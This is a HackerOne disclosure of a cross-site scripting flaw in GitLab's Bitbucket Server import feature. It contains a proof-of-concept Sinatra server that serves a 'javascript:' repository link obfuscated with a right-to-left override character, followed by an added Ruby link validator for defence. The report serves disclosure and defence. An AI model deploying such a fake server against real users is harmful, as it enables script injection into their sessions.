Cross-Site Scripting In BitbucketServer Import
HackerOne report #638698 by nyangawa
on 2019-07-10, assigned to estrike
Summary
The BitbucketServerImport::Importer of GitLab trusts the response from a (possibly malicious) Bitbucket server without sanitizing the links of repositories. An attacker could set up a fake Bitbucket server and ask the victim to import repositories from it; the XSS payload is triggered when the victim clicks the links of the candidate repositories.
Steps to reproduce
- Select "New Project" > "Import Project" > "Bitbucket Server"
- Fill in the form with "http://bitbucket.nyangawa.me:4567" in the URL field and an arbitrary username/password.
- Click the link of the first repository.
Description
The source code of the PoC server (a small Sinatra app) is as follows:

require 'sinatra'
require 'json'

# Fake Bitbucket Server endpoint that the GitLab importer calls to list repositories.
get '/rest/api/1.0/repos' do
  content_type :json
  repos_resp
end

def repos_resp
  {
    "size": 1,
    "limit": 25,
    "isLastPage": true,
    "values": [
      {
        "slug": "\"",
        "id": 1,
        "name": "My repo",
        "description": "My repo description",
        "scmId": "git",
        "state": "AVAILABLE",
        "statusMessage": "Available",
        "forkable": true,
        "project": {
          "key": "PROJECT",
          "id": 1,
          "name": "My Cool Project",
          "description": "The description for my cool project.",
          "public": true,
          "type": "NORMAL",
          "links": {
            "self": [
              {
                "href": "http://link/to/project"
              }
            ]
          }
        },
        "public": true,
        "links": {
          "clone": [
            {
              "href": "ssh://git@<baseURL>/PRJ/my-repo.git",
              "name": "ssh"
            },
            {
              "href": "https://<baseURL>/scm/PRJ/my-repo.git",
              "name": "http"
            }
          ],
          "self": [
            {
              # The repository "self" link is rendered by the importer without sanitization.
              "href": "jAvAsCrIpT:\"Click HERE!!\u202e\";alert(document.domain)"
            }
          ]
        }
      }
    ],
    "start": 0
  }.to_json
end
The \u202e (Unicode right-to-left override) in the link is used as an example of a possible obfuscation trick.
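As an added defender-side example (not part of the report and not GitLab's code), the Ruby below validates the repository "self" link taken from a Bitbucket Server repos response before it is rendered as an anchor: only absolute http(s) URLs survive, and anything else, including scheme case tricks and embedded bidi-override characters like the one in the payload above, is dropped. The function names and the sample response are assumptions constructed for this illustration.

```ruby
# Added example, not GitLab's importer code. Validates a repository link
# from a Bitbucket Server /rest/api/1.0/repos response before rendering.
require 'json'
require 'uri'

# Returns the href unchanged when it is a well-formed absolute http(s) URL,
# otherwise nil so the view falls back to plain text instead of a link.
def safe_repo_link(href)
  return nil unless href.is_a?(String)
  href = href.strip
  # Reject ASCII control characters and Unicode bidi-override / isolate
  # characters (U+202E among them), which can disguise the real target.
  return nil if href.match?(/[\u0000-\u001F\u007F\u200E\u200F\u202A-\u202E\u2066-\u2069]/)
  uri = URI.parse(href)
  # URI.parse downcases the scheme, so "jAvAsCrIpT:" is still not HTTP here;
  # URI::HTTPS is a subclass of URI::HTTP, so both schemes pass this check.
  return nil unless uri.is_a?(URI::HTTP)
  return nil if uri.host.nil? || uri.host.empty?
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Extracts each repository's "self" link from a repos response and runs it
# through the validator, the way an importer would before rendering a list.
def repo_links_from_response(json)
  JSON.parse(json).fetch('values', []).map do |repo|
    href = repo.dig('links', 'self', 0, 'href')
    [repo['name'], safe_repo_link(href)]
  end
end

# Constructed sample response: one benign entry, one carrying the payload
# from the report (hostnames are placeholders).
SAMPLE_RESPONSE = JSON.generate(
  'values' => [
    { 'name' => 'good',
      'links' => { 'self' => [{ 'href' => 'https://bitbucket.example.com/projects/PRJ/repos/my-repo' }] } },
    { 'name' => 'bad',
      'links' => { 'self' => [{ 'href' => "jAvAsCrIpT:\"Click HERE!!\u202e\";alert(document.domain)" }] } }
  ]
)
```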
Results of GitLab environment info
I tested this on gitlab.com.
Impact
It's a common XSS attack vector, and user interaction is required to complete the attack. The attacker could use some obfuscation tricks to hide the real purpose of the payload. However, it's easy for cautious users to protect themselves from being attacked. So I think the impact is low.